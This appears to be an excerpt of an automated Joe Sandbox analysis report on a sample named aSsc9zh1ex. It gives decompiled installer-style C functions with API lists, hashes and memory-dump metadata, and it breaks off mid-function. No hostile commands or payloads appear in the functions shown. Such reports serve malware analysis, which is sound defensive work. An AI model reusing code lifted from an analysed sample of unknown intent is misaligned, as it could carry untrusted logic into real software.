                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                        • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                        • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                        • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004034C2(long _a4) {
                        				long _t2;
                        
                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                        				return _t2;
                        			}





                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004044AB(int _a4) {
                        				long _t2;
                        
                        				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
                        				return _t2;
                        			}





                        APIs
                        • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                        • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                        • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                        • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404498(int _a4) {
                        				int _t2;
                        
                        				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
                        				return _t2;
                        			}





                        APIs
                        • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                        • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                        • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                        • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004014D7(intOrPtr __edx) {
                        				long _t3;
                        				void* _t7;
                        				intOrPtr _t10;
                        				void* _t13;
                        
                        				_t10 = __edx;
                        				_t3 = E00402D84(_t7);
                        				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                        				if(_t3 <= 1) {
                        					_t3 = 1;
                        				}
                        				Sleep(_t3); // executed
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
                        				return 0;
                        			}








                        APIs
                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                        • Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
                        • Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                        • Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E732D12BB() {
                        				void* _t3;
                        
                        				_t3 = GlobalAlloc(0x40,  *0x732d506c +  *0x732d506c); // executed
                        				return _t3;
                        			}





                        APIs
                        • GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: AllocGlobal
                        • String ID:
                        • API String ID: 3761449716-0
                        • Opcode ID: c8d594a65c58ce9610afa1877a53426dab581a217eedfecdbc21883f9fa63a83
                        • Instruction ID: c0315237ac46f11e2d056d425b69564bf6039ae46e97ccdc33f3e324f7399fb4
                        • Opcode Fuzzy Hash: c8d594a65c58ce9610afa1877a53426dab581a217eedfecdbc21883f9fa63a83
                        • Instruction Fuzzy Hash: 1BB012B2E10010DFEF00BB65DC4EF343294E704303F24C040FA08C0180C66048209934
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				long _v16;
                        				long _v20;
                        				long _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				long _v36;
                        				char _v40;
                        				unsigned int _v44;
                        				signed int _v48;
                        				WCHAR* _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				WCHAR* _v72;
                        				void _v76;
                        				struct HWND__* _v80;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t82;
                        				long _t87;
                        				short* _t89;
                        				void* _t95;
                        				signed int _t96;
                        				int _t109;
                        				signed short _t114;
                        				signed int _t118;
                        				struct HWND__** _t122;
                        				intOrPtr* _t138;
                        				WCHAR* _t146;
                        				unsigned int _t150;
                        				signed int _t152;
                        				unsigned int _t156;
                        				signed int _t158;
                        				signed int* _t159;
                        				signed int* _t160;
                        				struct HWND__* _t166;
                        				struct HWND__* _t167;
                        				int _t169;
                        				unsigned int _t197;
                        
                        				_t156 = __edx;
                        				_t82 =  *0x7a0f20; // 0xa1e104
                        				_v32 = _t82;
                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                        				if(_a8 == 0x40b) {
                        					E00405B5E(0x3fb, _t146);
                        					E004067A1(_t146);
                        				}
                        				_t167 = _a4;
                        				if(_a8 != 0x110) {
                        					L8:
                        					if(_a8 != 0x111) {
                        						L20:
                        						if(_a8 == 0x40f) {
                        							L22:
                        							_v8 = _v8 & 0x00000000;
                        							_v12 = _v12 & 0x00000000;
                        							E00405B5E(0x3fb, _t146);
                        							if(E00405EF1(_t186, _t146) == 0) {
                        								_v8 = 1;
                        							}
                        							E0040651A(0x79ff18, _t146);
                        							_t87 = E004068E7(1);
                        							_v16 = _t87;
                        							if(_t87 == 0) {
                        								L30:
                        								E0040651A(0x79ff18, _t146);
                        								_t89 = E00405E94(0x79ff18);
                        								_t158 = 0;
                        								if(_t89 != 0) {
                        									 *_t89 = 0;
                        								}
                        								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                        									goto L35;
                        								} else {
                        									_t169 = 0x400;
                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                        									asm("cdq");
                        									_v48 = _t109;
                        									_v44 = _t156;
                        									_v12 = 1;
                        									goto L36;
                        								}
                        							} else {
                        								_t159 = 0;
                        								if(0 == 0x79ff18) {
                        									goto L30;
                        								} else {
                        									goto L26;
                        								}
                        								while(1) {
                        									L26:
                        									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
                        									if(_t114 != 0) {
                        										break;
                        									}
                        									if(_t159 != 0) {
                        										 *_t159 =  *_t159 & _t114;
                        									}
                        									_t160 = E00405E35(0x79ff18);
                        									 *_t160 =  *_t160 & 0x00000000;
                        									_t159 = _t160;
                        									 *_t159 = 0x5c;
                        									if(_t159 != 0x79ff18) {
                        										continue;
                        									} else {
                        										goto L30;
                        									}
                        								}
                        								_t150 = _v44;
                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                        								_v44 = _t150 >> 0xa;
                        								_v12 = 1;
                        								_t158 = 0;
                        								__eflags = 0;
                        								L35:
                        								_t169 = 0x400;
                        								L36:
                        								_t95 = E00404E04(5);
                        								if(_v12 != _t158) {
                        									_t197 = _v44;
                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                        										_v8 = 2;
                        									}
                        								}
                        								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
                        									E00404DEC(0x3ff, 0xfffffffb, _t95);
                        									if(_v12 == _t158) {
                        										SetDlgItemTextW(_a4, _t169, 0x79ff08);
                        									} else {
                        										E00404D23(_t169, 0xfffffffc, _v48, _v44);
                        									}
                        								}
                        								_t96 = _v8;
                        								 *0x7a8b04 = _t96;
                        								if(_t96 == _t158) {
                        									_v8 = E0040140B(7);
                        								}
                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                        									_v8 = _t158;
                        								}
                        								E00404498(0 | _v8 == _t158);
                        								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
                        									E004048C0();
                        								}
                        								 *0x7a1f38 = _t158;
                        								goto L53;
                        							}
                        						}
                        						_t186 = _a8 - 0x405;
                        						if(_a8 != 0x405) {
                        							goto L53;
                        						}
                        						goto L22;
                        					}
                        					_t118 = _a12 & 0x0000ffff;
                        					if(_t118 != 0x3fb) {
                        						L12:
                        						if(_t118 == 0x3e9) {
                        							_t152 = 7;
                        							memset( &_v76, 0, _t152 << 2);
                        							_v80 = _t167;
                        							_v72 = 0x7a1f48;
                        							_v60 = E00404CBD;
                        							_v56 = _t146;
                        							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
                        							_t122 =  &_v80;
                        							_v64 = 0x41;
                        							__imp__SHBrowseForFolderW(_t122);
                        							if(_t122 == 0) {
                        								_a8 = 0x40f;
                        							} else {
                        								__imp__CoTaskMemFree(_t122);
                        								E00405DE9(_t146);
                        								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
                        								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                        									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
                        									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
                        										lstrcatW(_t146, 0x7a6a00);
                        									}
                        								}
                        								 *0x7a1f38 =  *0x7a1f38 + 1;
                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                        							}
                        						}
                        						goto L20;
                        					}
                        					if(_a12 >> 0x10 != 0x300) {
                        						goto L53;
                        					}
                        					_a8 = 0x40f;
                        					goto L12;
                        				} else {
                        					_t166 = GetDlgItem(_t167, 0x3fb);
                        					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
                        						E00405DE9(_t146);
                        					}
                        					 *0x7a7a38 = _t167;
                        					SetWindowTextW(_t166, _t146);
                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                        					_push(1);
                        					E00404476(_t167);
                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                        					_push(0x14);
                        					E00404476(_t167);
                        					E004044AB(_t166);
                        					_t138 = E004068E7(8);
                        					if(_t138 == 0) {
                        						L53:
                        						return E004044DD(_a8, _a12, _a16);
                        					} else {
                        						 *_t138(_t166, 1);
                        						goto L8;
                        					}
                        				}
                        			}

                        APIs
                        • GetDlgItem.USER32 ref: 004049B6
                        • SetWindowTextW.USER32(00000000,?), ref: 004049E0
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                        • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                        • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
                        • lstrcatW.KERNEL32(?,Call), ref: 00404ADA
                        • SetDlgItemTextW.USER32 ref: 00404AEC
                          • Part of subcall function 00405B5E: GetDlgItemTextW.USER32 ref: 00405B71
                          • Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                          • Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                          • Part of subcall function 004067A1: CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                          • Part of subcall function 004067A1: CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                        • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA
                          • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                          • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                          • Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                        • API String ID: 2624150263-1655598669
                        • Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                        • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                        • Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                        • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E004021AA(void* __eflags) {
                        				signed int _t52;
                        				void* _t56;
                        				intOrPtr* _t60;
                        				intOrPtr _t61;
                        				intOrPtr* _t62;
                        				intOrPtr* _t64;
                        				intOrPtr* _t66;
                        				intOrPtr* _t68;
                        				intOrPtr* _t70;
                        				intOrPtr* _t72;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr* _t78;
                        				intOrPtr* _t80;
                        				void* _t83;
                        				intOrPtr* _t91;
                        				signed int _t101;
                        				signed int _t105;
                        				void* _t107;
                        
                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                        				_t52 =  *(_t107 - 0x20);
                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                        				_t101 = _t52 & 0x00008000;
                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                        				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                        					E00402DA6(0x21);
                        				}
                        				_t56 = _t107 + 8;
                        				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                        				if(_t56 < _t83) {
                        					L14:
                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                        					_push(0xfffffff0);
                        				} else {
                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                        					if(_t61 >= _t83) {
                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                        						if(_t101 == _t83) {
                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                        						}
                        						if(_t105 != _t83) {
                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                        						}
                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                        						if( *_t91 != _t83) {
                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                        						}
                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                        						}
                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                        					}
                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        						_push(0xfffffff4);
                        					} else {
                        						goto L14;
                        					}
                        				}
                        				E00401423();
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
                        				return 0;
                        			}

                        APIs
                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CreateInstance
                        • String ID:
                        • API String ID: 542301482-0
                        • Opcode ID: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
                        • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                        • Opcode Fuzzy Hash: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
                        • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
                        				void* _t21;
                        
                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                        					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
                        					_push(_t21 - 0x2b0);
                        					_push(__edi);
                        					E0040651A();
                        				} else {
                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                        					 *__edi = __ebx;
                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
                        				return 0;
                        			}





                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
                        • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                        • Opcode Fuzzy Hash: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
                        • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                        				struct HWND__* _v8;
                        				struct HWND__* _v12;
                        				long _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				signed char* _v32;
                        				int _v36;
                        				signed int _v44;
                        				int _v48;
                        				signed int* _v60;
                        				signed char* _v64;
                        				signed int _v68;
                        				long _v72;
                        				void* _v76;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t198;
                        				intOrPtr _t201;
                        				long _t207;
                        				signed int _t211;
                        				signed int _t222;
                        				void* _t225;
                        				void* _t226;
                        				int _t232;
                        				long _t237;
                        				long _t238;
                        				signed int _t239;
                        				signed int _t245;
                        				signed int _t247;
                        				signed char _t248;
                        				signed char _t254;
                        				void* _t258;
                        				void* _t260;
                        				signed char* _t278;
                        				signed char _t279;
                        				long _t284;
                        				struct HWND__* _t291;
                        				signed int* _t292;
                        				int _t293;
                        				long _t294;
                        				signed int _t295;
                        				void* _t297;
                        				long _t298;
                        				int _t299;
                        				signed int _t300;
                        				signed int _t303;
                        				signed int _t311;
                        				signed char* _t319;
                        				int _t324;
                        				void* _t326;
                        
                        				_t291 = _a4;
                        				_v12 = GetDlgItem(_t291, 0x3f9);
                        				_v8 = GetDlgItem(_t291, 0x408);
                        				_t326 = SendMessageW;
                        				_v24 =  *0x7a8a88;
                        				_v28 =  *0x7a8a70 + 0x94;
                        				if(_a8 != 0x110) {
                        					L23:
                        					if(_a8 != 0x405) {
                        						_t301 = _a16;
                        					} else {
                        						_a12 = 0;
                        						_t301 = 1;
                        						_a8 = 0x40f;
                        						_a16 = 1;
                        					}
                        					if(_a8 == 0x4e || _a8 == 0x413) {
                        						_v16 = _t301;
                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                        							if(( *0x7a8a79 & 0x00000002) != 0) {
                        								L41:
                        								if(_v16 != 0) {
                        									_t237 = _v16;
                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                        									}
                        									_t238 = _v16;
                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                        										_t301 = _v24;
                        										_t239 =  *(_t238 + 0x5c);
                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                        										} else {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                        										}
                        									}
                        								}
                        								goto L48;
                        							}
                        							if(_a8 == 0x413) {
                        								L33:
                        								_t301 = 0 | _a8 != 0x00000413;
                        								_t245 = E00404E31(_v8, _a8 != 0x413);
                        								_t295 = _t245;
                        								if(_t295 >= 0) {
                        									_t94 = _v24 + 8; // 0x8
                        									_t301 = _t245 * 0x818 + _t94;
                        									_t247 =  *_t301;
                        									if((_t247 & 0x00000010) == 0) {
                        										if((_t247 & 0x00000040) == 0) {
                        											_t248 = _t247 ^ 0x00000001;
                        										} else {
                        											_t254 = _t247 ^ 0x00000080;
                        											if(_t254 >= 0) {
